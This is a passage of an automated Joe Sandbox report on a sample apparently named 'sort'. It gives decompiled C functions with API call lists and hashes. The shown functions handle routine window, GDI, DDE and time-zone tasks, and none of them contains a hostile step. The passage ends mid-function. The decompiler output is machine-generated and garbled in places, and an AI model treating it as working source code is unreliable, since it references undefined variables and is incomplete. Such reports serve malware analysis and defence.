                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                            • String ID:
                                            • API String ID: 670545878-0
                                            • Opcode ID: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
                                            • Instruction ID: 79cfeeef415f6b616a2a8b62cc4a1a68cb8ced5d87a6c48b433ad5091e6d0582
                                            • Opcode Fuzzy Hash: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
                                            • Instruction Fuzzy Hash: 5F119E327012216B86312A6A9C84BABB398DF94B54F09052FEC00E7314FF28DC8242ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E00420A8B(intOrPtr _a4) {
                                            				intOrPtr _v4;
                                            				struct HWND__* _t15;
                                            				struct HWND__* _t17;
                                            				signed int _t21;
                                            				intOrPtr _t28;
                                            				void* _t30;
                                            				struct HWND__* _t32;
                                            
                                            				_v4 = _t28;
                                            				_t15 = GetWindow(GetDesktopWindow(), 5);
                                            				_t32 = _t15;
                                            				if(_t32 == 0) {
                                            					return _t15;
                                            				} else {
                                            					while(1) {
                                            						_push(_t32);
                                            						_t30 = E00413767();
                                            						if(_t30 != 0) {
                                            							_t19 =  *((intOrPtr*)(_v4 + 0x1c));
                                            							if( *((intOrPtr*)(_v4 + 0x1c)) != _t32 && E004208E0(_t19, _t32) != 0) {
                                            								_t21 = GetWindowLongA(_t32, 0xfffffff0);
                                            								if(_a4 != 0) {
                                            									if((_t21 & 0x18000000) == 0 && ( *(_t30 + 0x24) & 0x00000002) != 0) {
                                            										ShowWindow(_t32, 4);
                                            										 *(_t30 + 0x24) =  *(_t30 + 0x24) & 0xfffffffd;
                                            									}
                                            								} else {
                                            									if((_t21 & 0x18000000) == 0x10000000) {
                                            										ShowWindow(_t32, 0);
                                            										 *(_t30 + 0x24) =  *(_t30 + 0x24) | 0x00000002;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						_t17 = GetWindow(_t32, 2);
                                            						_t32 = _t17;
                                            						if(_t32 == 0) {
                                            							return _t17;
                                            						}
                                            					}
                                            				}
                                            			}











                                            APIs
                                            • GetDesktopWindow.USER32 ref: 00420A94
                                            • GetWindow.USER32(00000000), ref: 00420AA1
                                            • GetWindowLongA.USER32 ref: 00420AD6
                                            • ShowWindow.USER32(00000000,00000000), ref: 00420AF2
                                            • ShowWindow.USER32(00000000,00000004), ref: 00420B0A
                                            • GetWindow.USER32(00000000,00000002), ref: 00420B13
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$Show$DesktopLong
                                            • String ID:
                                            • API String ID: 3178490500-0
                                            • Opcode ID: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
                                            • Instruction ID: 7b09bf3e44239edb134f584a809b554a06cce84e6abb4a59c0b4e2be1682ca92
                                            • Opcode Fuzzy Hash: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
                                            • Instruction Fuzzy Hash: 5F11C27170173926D2319664AC49F1FBBDC9F51768FD00616FA10A3286DBACE84186AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E0042986F(void* __ecx) {
                                            				int _v8;
                                            				char _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				int _t14;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
                                            				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
                                            				_v8 = _t14;
                                            				E004298F1(__ecx,  &_v12);
                                            				SetMapMode( *(__ecx + 4), 1);
                                            				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
                                            				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
                                            				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
                                            				return E004296EA(_t14, __ecx, 0, 0);
                                            			}









                                            APIs
                                            • GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
                                            • GetDeviceCaps.GDI32(?,00000008), ref: 0042988D
                                              • Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
                                              • Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F
                                            • SetMapMode.GDI32(?,00000001), ref: 004298A5
                                            • SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
                                            • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
                                            • IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE
                                              • Part of subcall function 004296EA: GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
                                              • Part of subcall function 004296EA: GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
                                              • Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,00000058), ref: 00429779
                                              • Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
                                              • Part of subcall function 004296EA: SetMapMode.GDI32(00000000,00000008), ref: 004297BC
                                              • Part of subcall function 004296EA: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
                                              • Part of subcall function 004296EA: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
                                            • String ID:
                                            • API String ID: 1729379761-0
                                            • Opcode ID: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
                                            • Instruction ID: ffdc988b3e99ab10a3d87d522c915a36f24d74d83ef75783a8118d4b02154ef1
                                            • Opcode Fuzzy Hash: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
                                            • Instruction Fuzzy Hash: 10012D31600204BFDB315B56DC4AD5BBFB9EF89B20B40462DF166921A0DB71AD11DB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 40%
                                            			E004215FF(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
                                            				void* _v8;
                                            				char _v12;
                                            				char _v532;
                                            				void* __ebp;
                                            				long _t19;
                                            				void* _t23;
                                            				void* _t27;
                                            
                                            				_push( &_v8);
                                            				_push( &_v12);
                                            				_push(_a8);
                                            				_t27 = __ecx;
                                            				_push(0x3e8);
                                            				L0040C37C();
                                            				lstrcpynA( &_v532, GlobalLock(_v8), 0x208);
                                            				_t19 = GlobalUnlock(_v8);
                                            				_push(_v8);
                                            				_push(0x8000);
                                            				_push(0x3e4);
                                            				_push(0x3e8);
                                            				_push(_a8);
                                            				L0040C376();
                                            				PostMessageA(_a4, 0x3e4,  *(_t27 + 0x1c), _t19);
                                            				if(E004166B3(_t27) != 0) {
                                            					_t23 = E00424BFB();
                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 4)))) + 0x94))( &_v532);
                                            				}
                                            				return 0;
                                            			}











                                            APIs
                                            • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0042161E
                                            • GlobalLock.KERNEL32 ref: 00421626
                                            • lstrcpynA.KERNEL32(?,00000000,00000208), ref: 00421639
                                            • GlobalUnlock.KERNEL32(?), ref: 00421642
                                            • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0042165A
                                            • PostMessageA.USER32 ref: 00421667
                                              • Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 2333435275-0
                                            • Opcode ID: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
                                            • Instruction ID: 4c25832e6e6faa34b872796a1f01560d3fa617591b77e043d0f58556844ee018
                                            • Opcode Fuzzy Hash: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
                                            • Instruction Fuzzy Hash: 86018436600108FFDB11ABA1DC89EDF7BBDEF58304F004175B909E6161DB349E559BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A8B4(struct HWND__* _a4) {
                                            				struct HWND__* _t3;
                                            				struct HWND__* _t7;
                                            				struct HWND__* _t9;
                                            				struct HWND__* _t11;
                                            
                                            				_t3 = GetFocus();
                                            				_t11 = _t3;
                                            				if(_t11 != 0) {
                                            					_t9 = _a4;
                                            					if(_t11 != _t9) {
                                            						if(E0041A759(_t11, 3) != 0) {
                                            							L5:
                                            							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
                                            								L8:
                                            								return SendMessageA(_t11, 0x14f, 0, 0);
                                            							}
                                            							_t7 = GetParent(_t9);
                                            							_t3 = GetDesktopWindow();
                                            							if(_t7 != _t3) {
                                            								goto L8;
                                            							}
                                            						} else {
                                            							_t3 = GetParent(_t11);
                                            							_t11 = _t3;
                                            							if(_t11 != _t9) {
                                            								_t3 = E0041A759(_t11, 2);
                                            								if(_t3 != 0) {
                                            									goto L5;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t3;
                                            			}








                                            APIs
                                            • GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7
                                              • Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A
                                            • GetParent.USER32(00000000), ref: 0041A8DE
                                              • Part of subcall function 0041A759: GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
                                              • Part of subcall function 0041A759: lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794
                                            • GetWindowLongA.USER32 ref: 0041A8F9
                                            • GetParent.USER32(?), ref: 0041A907
                                            • GetDesktopWindow.USER32 ref: 0041A90B
                                            • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041A91F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                            • String ID:
                                            • API String ID: 2818563221-0
                                            • Opcode ID: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
                                            • Instruction ID: 0ef3fffee83f5250149677f0c627e80be30cc9893a9c62ed2a9ad1800b3459ea
                                            • Opcode Fuzzy Hash: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
                                            • Instruction Fuzzy Hash: 27F0F9712022212AD23127355C4CBEF53689F86B58F5A0527F411E62D0EB1CDDD241AE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 42%
                                            			E0041A7CE(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                            				struct tagRECT _v20;
                                            				struct HWND__* _t22;
                                            
                                            				ClientToScreen(_a4,  &_a8);
                                            				_push(5);
                                            				_push(_a4);
                                            				while(1) {
                                            					_t22 = GetWindow();
                                            					if(_t22 == 0) {
                                            						break;
                                            					}
                                            					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
                                            						L5:
                                            						_push(2);
                                            						_push(_t22);
                                            						continue;
                                            					} else {
                                            						GetWindowRect(_t22,  &_v20);
                                            						_push(_a12);
                                            						if(PtInRect( &_v20, _a8) != 0) {
                                            							return _t22;
                                            						}
                                            						goto L5;
                                            					}
                                            				}
                                            				return 0;
                                            			}






                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                            • String ID:
                                            • API String ID: 1315500227-0
                                            • Opcode ID: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
                                            • Instruction ID: 073ddf0fe74a93c2ca18b2cdbf6cccc684bfe4d9908968ef648256188d18c8f8
                                            • Opcode Fuzzy Hash: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
                                            • Instruction Fuzzy Hash: AE017C31201119BBDB21AB649C08EEF776CEF54710F804531F911D51A0E734D963CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E0040A586() {
                                            				int _v8;
                                            				char* _v12;
                                            				void* __ecx;
                                            				char* _t18;
                                            				intOrPtr _t19;
                                            				intOrPtr _t23;
                                            				char* _t27;
                                            				char _t29;
                                            				char _t30;
                                            				signed int _t32;
                                            				char _t34;
                                            				void* _t35;
                                            				char _t36;
                                            				void* _t37;
                                            				signed int _t39;
                                            				signed int _t40;
                                            				char* _t43;
                                            				char* _t46;
                                            				intOrPtr _t47;
                                            				void* _t56;
                                            				signed int _t60;
                                            				signed int _t63;
                                            				signed int _t65;
                                            				signed int _t67;
                                            				intOrPtr _t68;
                                            				void* _t69;
                                            				void* _t70;
                                            				char* _t74;
                                            				char* _t76;
                                            				signed int** _t80;
                                            				intOrPtr _t86;
                                            				intOrPtr _t88;
                                            
                                            				_push(_t55);
                                            				_t70 = 0xc;
                                            				_v12 = 0;
                                            				E004079D4(_t70);
                                            				 *0x4373d8 =  *0x4373d8 | 0xffffffff;
                                            				 *0x4373c8 =  *0x4373c8 | 0xffffffff;
                                            				 *0x439f08 = 0;
                                            				 *_t80 = 0x42f6a8;
                                            				_t74 = E0040B475();
                                            				_t56 = _t69;
                                            				if(_t74 != 0) {
                                            					if( *_t74 == 0) {
                                            						L41:
                                            						_t18 = E00407A35(_t70);
                                            					} else {
                                            						_t19 =  *0x439fbc; // 0x0
                                            						if(_t19 == 0) {
                                            							L18:
                                            							E004062E0( *0x439fbc);
                                            							_t23 = E00405667(E00405A40(_t74) + 1);
                                            							 *0x439fbc = _t23;
                                            							if(_t23 == 0) {
                                            								goto L41;
                                            							} else {
                                            								E00409B00(_t23, _t74);
                                            								E00407A35(_t70);
                                            								E0040AD30( *0x4373bc, _t74, 3);
                                            								_t27 =  *0x4373bc; // 0x43733c
                                            								_t76 = _t74 + 3;
                                            								_t27[3] = _t27[3] & 0x00000000;
                                            								if( *_t76 == 0x2d) {
                                            									_v12 = 1;
                                            									_t76 = _t76 + 1;
                                            								}
                                            								_t60 = E004068F6(_t56, _t76) * 0xe10;
                                            								 *0x437330 = _t60;
                                            								while(1) {
                                            									_t29 =  *_t76;
                                            									if(_t29 != 0x2b && (_t29 < 0x30 || _t29 > 0x39)) {
                                            										break;
                                            									}
                                            									_t76 = _t76 + 1;
                                            								}
                                            								if( *_t76 == 0x3a) {
                                            									_t76 = _t76 + 1;
                                            									_t32 = E004068F6(_t60, _t76);
                                            									_t63 =  *0x437330; // 0x7080
                                            									_t60 = _t63 + _t32 * 0x3c;
                                            									 *0x437330 = _t60;
                                            									while(1) {
                                            										_t34 =  *_t76;
                                            										if(_t34 < 0x30 || _t34 > 0x39) {
                                            											break;
                                            										}
                                            										_t76 = _t76 + 1;
                                            									}
                                            									if( *_t76 == 0x3a) {
                                            										_t76 = _t76 + 1;
                                            										_t35 = E004068F6(_t60, _t76);
                                            										_t65 =  *0x437330; // 0x7080
                                            										_t60 = _t65 + _t35;
                                            										 *0x437330 = _t60;
                                            										while(1) {
                                            											_t36 =  *_t76;
                                            											if(_t36 < 0x30 || _t36 > 0x39) {
                                            												goto L36;
                                            											}
                                            											_t76 = _t76 + 1;
                                            										}
                                            									}
                                            								}
                                            								L36:
                                            								if(_v12 != 0) {
                                            									 *0x437330 =  ~_t60;
                                            								}
                                            								_t30 =  *_t76;
                                            								 *0x437334 = _t30;
                                            								if(_t30 == 0) {
                                            									goto L40;
                                            								} else {
                                            									E0040AD30( *0x4373c0, _t76, 3);
                                            									_t18 =  *0x4373c0; // 0x43737c
                                            									_t18[3] = _t18[3] & 0x00000000;
                                            								}
                                            							}
                                            						} else {
                                            							_t37 = E00409A70(_t74, _t19);
                                            							_pop(_t56);
                                            							if(_t37 == 0) {
                                            								goto L41;
                                            							} else {
                                            								goto L18;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					E00407A35(_t70);
                                            					 *_t80 = 0x439f10;
                                            					_t18 = GetTimeZoneInformation(??);
                                            					if(_t18 != 0xffffffff) {
                                            						_t39 =  *0x439f10; // 0x0
                                            						_t67 =  *0x439f64; // 0x0
                                            						_t40 = _t39 * 0x3c;
                                            						_t86 =  *0x439f56; // 0x0
                                            						_t68 = 1;
                                            						 *0x437330 = _t40;
                                            						 *0x439f08 = _t68;
                                            						if(_t86 != 0) {
                                            							 *0x437330 = _t40 + _t67 * 0x3c;
                                            						}
                                            						_t88 =  *0x439faa; // 0x0
                                            						if(_t88 == 0) {
                                            							L7:
                                            							 *0x437334 = 0;
                                            							 *0x437338 = 0;
                                            						} else {
                                            							_t47 =  *0x439fb8; // 0x0
                                            							if(_t47 == 0) {
                                            								goto L7;
                                            							} else {
                                            								 *0x437334 = _t68;
                                            								 *0x437338 = (_t47 - _t67) * 0x3c;
                                            							}
                                            						}
                                            						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f14, 0xffffffff,  *0x4373bc, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
                                            							_t43 =  *0x4373bc; // 0x43733c
                                            							 *_t43 =  *_t43 & 0x00000000;
                                            						} else {
                                            							_t46 =  *0x4373bc; // 0x43733c
                                            							_t46[0x3f] = _t46[0x3f] & 0x00000000;
                                            						}
                                            						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f68, 0xffffffff,  *0x4373c0, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
                                            							L40:
                                            							_t18 =  *0x4373c0; // 0x43737c
                                            							 *_t18 =  *_t18 & 0x00000000;
                                            						} else {
                                            							_t18 =  *0x4373c0; // 0x43737c
                                            							_t18[0x3f] = _t18[0x3f] & 0x00000000;
                                            						}
                                            					}
                                            				}
                                            				return _t18;
                                            			}




































                                            APIs
                                              • Part of subcall function 004079D4: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A11
                                              • Part of subcall function 004079D4: EnterCriticalSection.KERNEL32(?,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A2C
                                              • Part of subcall function 00407A35: LeaveCriticalSection.KERNEL32(?,004056C9,00000009,?,00000009,00000000,?,00405689,000000E0,00405676,?,004079F4,00000018,00000000,?), ref: 00407A42
                                            • GetTimeZoneInformation.KERNEL32(0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A5D4
                                            • WideCharToMultiByte.KERNEL32(00000220,00439F14,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A66A
                                            • WideCharToMultiByte.KERNEL32(00000220,00439F68,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A6A3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                            • String ID: <sC$|sC
                                            • API String ID: 3442286286-4181122796
                                            • Opcode ID: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
                                            • Instruction ID: b677b28e1722a814c3f057f402e4873ea4966b7f4bec670f8581aa156dfe752d
                                            • Opcode Fuzzy Hash: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
                                            • Instruction Fuzzy Hash: BC61D7B15083409AD7319F29AC85B6A3BA9E701314F24613FFCC1A72E1D7788D62D75E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00413E4C(intOrPtr* __ecx) {
                                            				struct HWND__* _v36;
                                            				struct HWND__* _v40;
                                            				signed char _v44;
                                            				void* _v48;
                                            				long _t33;
                                            				long _t41;
                                            				struct HWND__* _t46;
                                            				signed char _t58;
                                            				intOrPtr* _t61;
                                            				signed int _t62;
                                            				void* _t67;
                                            				intOrPtr _t69;
                                            				intOrPtr* _t70;
                                            
                                            				_t70 = __ecx;
                                            				_t67 = E004126FB();
                                            				if(_t67 != 0) {
                                            					if( *((intOrPtr*)(_t67 + 0x1c)) == __ecx) {
                                            						 *((intOrPtr*)(_t67 + 0x1c)) = 0;
                                            					}
                                            					if( *((intOrPtr*)(_t67 + 0x20)) == _t70) {
                                            						 *((intOrPtr*)(_t67 + 0x20)) = 0;
                                            					}
                                            				}
                                            				_t61 =  *((intOrPtr*)(_t70 + 0x30));
                                            				if(_t61 != 0) {
                                            					 *((intOrPtr*)( *_t61 + 0x50))();
                                            					 *((intOrPtr*)(_t70 + 0x30)) = 0;
                                            				}
                                            				_t62 =  *(_t70 + 0x34);
                                            				_t58 = 1;
                                            				if(_t62 != 0) {
                                            					 *((intOrPtr*)( *_t62 + 4))(_t58);
                                            				}
                                            				 *(_t70 + 0x34) =  *(_t70 + 0x34) & 0x00000000;
                                            				if(( *(_t70 + 0x24) & _t58) != 0) {
                                            					_t69 =  *((intOrPtr*)(E004249C4() + 0xcc));
                                            					if(_t69 != 0 &&  *(_t69 + 0x1c) != 0) {
                                            						E00406330( &_v48, 0, 0x2c);
                                            						_t46 =  *(_t70 + 0x1c);
                                            						_v40 = _t46;
                                            						_v36 = _t46;
                                            						_v48 = 0x28;
                                            						_v44 = _t58;
                                            						SendMessageA( *(_t69 + 0x1c), 0x405, 0,  &_v48);
                                            					}
                                            				}
                                            				_t33 = GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc);
                                            				E004136A7(_t70);
                                            				if(GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc) == _t33) {
                                            					_t41 =  *( *((intOrPtr*)( *_t70 + 0x80))());
                                            					if(_t41 != 0) {
                                            						SetWindowLongA( *(_t70 + 0x1c), 0xfffffffc, _t41);
                                            					}
                                            				}
                                            				E004137BE(_t70);
                                            				return  *((intOrPtr*)( *_t70 + 0xa4))();
                                            			}

                                            APIs
                                            • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00413F05
                                            • GetWindowLongA.USER32 ref: 00413F16
                                            • GetWindowLongA.USER32 ref: 00413F26
                                            • SetWindowLongA.USER32 ref: 00413F42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: LongWindow$MessageSend
                                            • String ID: (
                                            • API String ID: 2178440468-3887548279
                                            • Opcode ID: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
                                            • Instruction ID: dd2e24bc71a940e73787925e98583bd3eaf246f1b6150e13293b1a1c05b6b2eb
                                            • Opcode Fuzzy Hash: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
                                            • Instruction Fuzzy Hash: 3131C1306003109FDB20AF69D884BAEBBB4BF44315F10416EE54297791DB79ED85CF98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E004264D7(void* __ecx, void* __eflags) {
                                            				CHAR* _v8;
                                            				char _v268;
                                            				char _v528;
                                            				char _v784;
                                            				void* __ebp;
                                            				signed char* _t35;
                                            				intOrPtr _t39;
                                            				intOrPtr _t43;
                                            				CHAR* _t54;
                                            				void* _t62;
                                            				intOrPtr* _t63;
                                            				void* _t64;
                                            
                                            				_t55 = __ecx;
                                            				_t64 = __ecx;
                                            				_t62 = E00424BFB();
                                            				 *(_t62 + 8) =  *(_t64 + 0x68);
                                            				 *(_t62 + 0xc) =  *(_t64 + 0x68);
                                            				GetModuleFileNameA( *(_t64 + 0x68),  &_v528, 0x104);
                                            				_t35 = E004072C1(_t55,  &_v528, 0x2e);
                                            				 *_t35 =  *_t35 & 0x00000000;
                                            				_v8 = _t35;
                                            				E004265F4( &_v528,  &_v268, 0x104);
                                            				if( *((intOrPtr*)(_t64 + 0x88)) == 0) {
                                            					 *((intOrPtr*)(_t64 + 0x88)) = E004065EE( &_v268);
                                            				}
                                            				if( *((intOrPtr*)(_t64 + 0x78)) == 0) {
                                            					if(E00417298(0xe000,  &_v784, 0x100) == 0) {
                                            						_push( *((intOrPtr*)(_t64 + 0x88)));
                                            					} else {
                                            						_push( &_v784);
                                            					}
                                            					 *((intOrPtr*)(_t64 + 0x78)) = E004065EE();
                                            				}
                                            				_t39 =  *((intOrPtr*)(_t64 + 0x78));
                                            				 *((intOrPtr*)(_t62 + 0x10)) = _t39;
                                            				_t63 = _t64 + 0x8c;
                                            				if( *((intOrPtr*)(_t64 + 0x8c)) == 0) {
                                            					_t54 = _v8;
                                            					lstrcpyA(_t54, ".HLP");
                                            					_t39 = E004065EE( &_v528);
                                            					 *_t63 = _t39;
                                            					 *_t54 =  *_t54 & 0x00000000;
                                            				}
                                            				if( *((intOrPtr*)(_t64 + 0x90)) == 0) {
